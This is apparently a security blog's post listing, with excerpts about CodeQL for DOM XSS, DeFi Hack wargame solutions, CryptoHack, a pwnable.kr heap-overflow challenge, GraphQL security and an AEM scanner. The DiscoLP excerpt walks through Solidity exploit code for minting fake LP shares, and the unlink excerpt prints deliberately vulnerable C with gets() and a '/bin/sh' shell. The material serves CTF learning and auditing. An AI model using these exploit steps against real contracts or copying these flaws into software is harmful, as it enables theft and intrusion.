Using CodeQL to detect client-side vulnerabilities in web applications

GitHub’s CodeQL is a robust query language originally developed by Semmle that allows you to look for vulnerabilities in the source code. CodeQL is known as a tool to inspect open source repositories, however its usage is not limited just to it. In this article I will delve into approaches on how to use CodeQL for web application audits, specifically to discover client-side vulnerabilities.

The idea of CodeQL is to treat source code as a database which can be queried using SQL-like statements. There are lots of languages supported among which is JavaScript. For JavaScript both server-side and client-side flavours are supported. JS CodeQL understands modern editions such as ES6 as well as frameworks like React (with JSX) and Angular.

CodeQL is not just grep as it supports taint tracking which allows you to test if a given user input (a source) can reach a vulnerable function (a sink). This is especially useful when dealing with DOM-based Cross Site Scripting vulnerabilities. By tainting a user-supplied DOM property such as location.hash one can test if this value actually reaches one of the XSS sinks, e.g. document.innerHTML or document.write().

DeFi Hack solutions: DiscoLP

This is a series of write-ups on DeFi Hack, a wargame based on real-world DeFi vulnerabilities. Other posts:

DiscoLP

DiscoLP is a brand new liquidity mining protocol! You can participate by depositing some JIMBO or JAMBO tokens. All liquidity will be supplied to JIMBO-JAMBO Uniswap pair. By providing liquidity with us you will get DISCO tokens in return!

The goal of this level was to get at least 100 DISCO tokens having only 1 JIMBO and 1 JAMBO. The target contract DiscoLP had only one public function named “deposit” with an explicit statement in the comments:

// accepts only JIMBO or JAMBO tokens

Uniswap is designed in such a way that one has to deposit a pair of tokens in the same proportions, but this function allowed to stake a single token swapping half of the value for the second token. In return LP shares were awarded. This level is a replica of the rAAVE farming contract hack that happened in February, 2021. As you may guess, the depositToken() function was not limited to JIMBO or JAMBO tokens, but actually accepted any token, there was no validation of the _token argument. It means that literally any token could have been staked that allowed to mint DISCO out of thin air. Although the cause is simple, the attack execution requires multiple steps.

First of all, an attacker has to create an arbitrary token:

Token evil = new Token("Evil Token", "EVIL"); // Token is ERC20

After that attacker approves unlimited EVIL spending to the instance of the level and to the Uniswap router:

evil.approve(instance, 2**256 - 1);
evil.approve(_router, 2**256 - 1);

The goal of the whole attack is to get some fake LP shares after providing liquidity to the Uniswap pair with JIMBO and attacker’s EVIL token in place of JAMBO. The attacker also approves spending of JIMBO to the Uniswap router, so that the swap in the depositToken() function succeeds:

IERC20(tokenA).approve(_router, 2**256 - 1);

After that a JIMBO-EVIL Uniswap pair is created:

address pair = IUniswapV2Factory(_factory).createPair(address(evil), address(tokenA));

After transfering a single JIMBO token that we have to the attacker contract, we add liquidity to the created pool:

(uint256 amountA, uint256 amountB, uint256 _shares) = IUniswapV2Router(_router).addLiquidity(
  address(evil),
  address(tokenA),
  100000000000 * 10 ** 18, // EVIL liquidity
  1 * 10 ** 18,            // 1 JIMBO
  1, 1, 
  address(this), // address to send LP shares (attacker contract)
  2**256 - 1);

Finally we deposit fake LP shares to DiscoLP contract:

DiscoLP(instance).depositToken(address(evil), amount, 1);

After swapping zero-value EVIL tokens, we get plenty of DiscoLP shares! You can find the full source code of the attack contract here: https://github.com/Raz0r/defihack/blob/master/contracts/attacks/DiscoLPAttack.sol

DeFi Hack solutions: May The Force Be With You

Back in 2018 I hosted the contest EtherHack which featured a set of vulnerable smart contracts. At that time the tasks were focused primarily on the EVM peculiarities like insecure randomness or extcodesize opcode tricks. Back then the first wave of crypto hype was coming to the end when numerous ICOs were falling apart because they did not deliver on expectations. Nowadays the crypto space is much more mature as it has got a truly useful and promising application of the blockchain technology: DeFi. 

DeFi stands for decentralized finance and aims at replacing traditional financial institutions like banks, hedge funds, insurance companies and many others. By eliminating the third party, DeFi allows to manage funds in a truly decentralized way minimizing corruption and promoting real ownership. With that said, DeFi is transparent not only to the legitimate users but also to the malicious actors. That is why smart contract failures are as critical as never before. The composability of different DeFi protocols increases the complexity of smart contract interactions. It is a really hard task to make a smart contract secure which is proved by numerous hacks of DeFi protocols that have happened over the past months. In order to raise awareness and demonstrate typical vulnerabilities of DeFi protocols me and Omar Ganiev (twitter, telegram) created the DeFi Hack wargame. Unlike Damn Vulnerable DeFi, a similar CTF made by OpenZeppelin, the tasks of DeFi Hack are based on real vulnerabilities of DeFi protocols. This is the walkthrough of the first level.

May The Force Be With You

A long time ago in a galaxy far, far away… a new DAO was created. Can you steal all the YODA tokens belonging to MayTheForceBeWithYou contract?

This level replicates the ForceDAO hack that happened in April, 2021 and resulted in the loss of 183 ETH (~$367K). The original vulnerable xFORCE smart contract was a fork of the xSUSHI vault. It allowed to deposit some FORCE tokens and get some xFORCE minted in return. When the contract transferred FORCE tokens from the user, it assumed that transferFrom() would revert if the user did not have enough tokens. However, the contract used Aragon’s MiniMe ERC20 implementation that returned a boolean value instead of reverting:

function doTransfer(address _from, address _to, uint _amount) internal returns(bool) {
        if (_amount == 0) {
            return true;
        }
        // Do not allow transfer to 0x0 or the token contract itself
        require((_to != address(0)) && (_to != address(this)));
        // If the amount being transfered is more than the balance of the
        //  account the transfer returns false
        if (balances[_from] < _amount) {
            return false;
        }

        // First update the balance array with the new value for the address
        //  sending the tokens
        balances[_from] = balances[_from] - _amount;
        // Then update the balance array with the new value for the address
        //  receiving the tokens

        require(balances[_to] + _amount >= balances[_to]); // Check for overflow
        balances[_to] = balances[_to] + _amount;
        // An event to make the transfer easy to find on the blockchain
        Transfer(_from, _to, _amount);
        return true;
    }

As you can see instead of calling revert() the contract just returns false if the balance is insufficient. It means that it was possible to basically mint tokens for free. The same logic was implemented in the task. In order to solve it one had to send two transactions: firstly call deposit() with the amount of xYODA tokens to mint, and then call withdraw() to drain the YODA tokens.

The source code of DeFi Hack is now open, you can see the solution of this level as a Hardhat test.

Other posts:

Takeaways from solving CryptoHack

Just over a month ago I learnt about a new “fun platform for learning modern cryptography” called CryptoHack. The platform looked fun indeed offering a gamified experience to master cryptography. A while ago I had a try at Matasano crypto challenges, which are now known as CryptoPals. In original Matasano challenges you had to mail your solutions for verification in order to obtain the next set of challenges which now seems ridiculous. I managed to solve just a couple of sets and abandoned it for good. I have no profound math background other than from high school and a little bit of combinatorics at the university. In order to proceed with the next sets it seemed to me that I really lack some necessary math knowledge.

However in CryptoHack there is another approach. It’s not just about challenges, but learning things. All the tasks are divided into logical categories: block ciphers, RSA, Diffie-Hellman, elliptic curves and others. Each category starts with preliminary tasks that teach you the basics that are behind well-known crypto algorithms. You start reading different sources: Wikipedia, crypto StackExchange, CTF writeups, obscure papers on arxiv.org to name the least. After enough reading you start to connect the dots and come up with solutions. I don’t remember a moment when I was more obsessed with mastering something than this time.

Here are some things that I learnt and really improved at for the past month thanks to CryptoHack:

Python 3. Endless hex and big number manipulation make you understand and remember gmpy2, PyCryptoDome and native Python 3 APIs. Python 2 seems barbaric as for now.

SageMath. Sage is a large piece of math software written in Python that covers different areas, particularly number theory which is very useful for solving CryptoHack challenges.

Fundamentals. Yeah, this is the most important one. Modular arithmetic, Chinese remainder theorem, Fermat’s little theorem, extended GCD and many others – these are the basics without which cryptography could not be imagined. And you will feel really comfortable with it.

An insight into the history of major crypto vulnerabilities. Playstation 3 hack, NSA’s Dual EC DRBG backdoor, Windows CryptoAPI failure, and others – this is something you may have heard but never understood in depth. When you try to implement the attack with bare hands you achieve another level of understanding.

I would like to thank @hyperreality and Jack for putting their efforts into creating this platform, and looking forward for the new challenges to be added.

Writeup: pwnable.kr “unlink”

Pretty easy task from pwnable.kr but took me waaay too long.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct tagOBJ{
        struct tagOBJ* fd;
        struct tagOBJ* bk;
        char buf[8];
}OBJ;

void shell(){
        system("/bin/sh");
}

void unlink(OBJ* P){
        OBJ* BK;
        OBJ* FD;
        BK=P->bk;
        FD=P->fd;
        FD->bk=BK;
        BK->fd=FD;
}
int main(int argc, char* argv[]){
        malloc(1024);
        OBJ* A = (OBJ*)malloc(sizeof(OBJ));
        OBJ* B = (OBJ*)malloc(sizeof(OBJ));
        OBJ* C = (OBJ*)malloc(sizeof(OBJ));

        // double linked list: A <-> B <-> C
        A->fd = B;
        B->bk = A;
        B->fd = C;
        C->bk = B;

        printf("here is stack address leak: %p\n", &A);
        printf("here is heap address leak: %p\n", A);
        printf("now that you have leaks, get shell!\n");
        // heap overflow!
        gets(A->buf);

        // exploit this unlink!
        unlink(B);
        return 0;
}

We’ve got here three structures allocated on the heap, which are doubly-linked in a ptalloc fashion where a chunk’s header contains a pointer to the previous chunk and to the next one. There is also an obvious overflow which presumably would allow us to corrupt these structures. At the start of the program an address from the heap and one from the stack are leaked which is quite handy since the binary has got ASLR enabled.

Why you should not use GraphQL schema generators

It has been quite a while since GraphQL has been introduced by Facebook, lots of tools and frameworks has appeared and are being used in the wild now. In 2017 I made an overview of the technology from the security point of view in the post “Looting GraphQL for Fun and Profit” and some of the predictions turned out to be true. For instance, “resolvers may contain ACL-related flaws“. In this post I would like to show an example of such case in a popular GraphQL backend called graphcool.

PolySwarm Smart Contract Hacking Challenge Writeup

This is a walk through for the smart contract hacking challenge organized by PolySwarm for CODE BLUE conference held in Japan on November 01–02. Although the challenge was supposed to be held on-site for whitelisted addresses only, Ben Schmidt of PolySwarm kindly shared a wallet so that I could participate in the challenge.

Adobe Experience Manager Vulnerability Scanner

Adobe Experience Manager is content management system that is based on Apache Sling – a framework for RESTful web-applications based on an extensible content tree. Apache Sling in its turn is basically a REST API for Apache Jackrabbit, which is an implementation of Content Repository API for Java (JCR). The main principle of JCR is that everything is a resource. It means that any object in JCR repository can be retrieved in multiple ways depending on requested selector. E.g. if you make a request to /index.html you will get an HTML page, but if you replace .html with a .json selector you can get metadata of this resource:

{
  "jcr:primaryType":"cq:Page",
  "jcr:createdBy":"transport-user",
  "jcr:created":"Mon Jun 13 2018 22:09:46 GMT+0000"
}

AEM installations typically have lots of hidden gems (even password hashes) if selectors are improperly configured. aemscan helps to discover such weaknesses and much more:

  • Default credentials bruteforce
  • Info leak via default error page
  • WebDav support check (WebDav OSGI XXE CVE-2015-1833)
  • Version detection
  • Useful paths scanner

You can grab the source code from GitHub: https://github.com/Raz0r/aemscan. Pull requests are welcome!

Looting GraphQL Endpoints for Fun and Profit

In one of the previous posts about the state of modern web applications security I mentioned GraphQL – a new technology for building APIs developed by Facebook. GraphQL is rapidly gaining popularity, more and more services switch to this technology, both web and mobile applications. Some of the GraphQL users are: GitHub, Shopify, Pintereset, HackerOne and many more. You can find many posts about GraphQL benefits and advantages over classic REST API on the internet, however there is not so much information about GraphQL security considerations. In this post I would like to elaborate on GraphQL: how it works, what the weak points are, how an attacker can abuse them, and which tools can be used.